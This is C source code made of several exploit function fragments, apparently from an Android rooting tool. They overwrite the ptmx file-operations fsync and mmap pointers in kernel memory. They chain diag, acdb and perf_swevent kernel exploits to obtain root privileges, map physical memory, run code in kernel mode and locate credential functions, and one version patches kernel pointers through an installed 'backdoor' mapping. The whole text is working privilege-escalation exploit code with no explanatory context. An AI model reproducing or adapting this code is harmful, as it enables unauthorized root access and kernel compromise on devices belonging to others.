static bool run_exploit(void) { unsigned long int ptmx_fsync_address; unsigned long int ptmx_fops_address; ptmx_fops_address = get_ptmx_fops_address(); if (!ptmx_fops_address) { return false; } ptmx_fsync_address = ptmx_fops_address + 0x38; if (attempt_diag_exploit(ptmx_fsync_address)) { return true; } printf("\n"); printf("Attempt acdb exploit...\n"); if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { return true; } printf("\n"); printf("Attempt perf_swevent exploit...\n"); return perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, run_obtain_root_privilege, NULL); }
static bool run_exploit(void) { void **ptmx_fsync_address; unsigned long int ptmx_fops_address; int fd; bool ret; ptmx_fops_address = get_ptmx_fops_address(); if (!ptmx_fops_address) { return false; } if (!backdoor_open_mmap()) { printf("Failed to mmap due to %s.\n", strerror(errno)); printf("Run 'install_backdoor' first\n"); return false; } ptmx_fsync_address = backdoor_convert_to_mmaped_address((void *)ptmx_fops_address + 0x38); *ptmx_fsync_address = load_msmsdcc; ret = run_load_msmsdcc(NULL); *ptmx_fsync_address = NULL; backdoor_close_mmap(); return ret; }
bool ptmx_map_memory(unsigned long int map_address, unsigned long int physical_address, unsigned long int size) { unsigned long int ptmx_fops_address; ptmx_fops_address = get_ptmx_fops_address(); if (!ptmx_fops_address) { return false; } return fops_map_physical_memory((void *)ptmx_fops_address, PTMX_DEVICE, FOPS_RUN_BY_EXPLOIT, map_address, physical_address, size); }
bool ptmx_run_in_kernel_mode(bool (*function)(void *), void *user_data) { unsigned long int ptmx_fops_address; ptmx_fops_address = get_ptmx_fops_address(); if (!ptmx_fops_address) { return false; } return fops_run_in_kernel_mode((void *)ptmx_fops_address, PTMX_DEVICE, FOPS_RUN_BY_KERNEL_MEMORY, function, user_data); }
static bool find_creds_functions_in_memory(void) { unsigned long int ptmx_mmap_address; ptmx_mmap_address = get_ptmx_fops_address() + 0x28; if (diag_is_supported()) { return find_with_diag_exploit(ptmx_mmap_address); } return find_with_perf_swevent_exploit(ptmx_mmap_address); }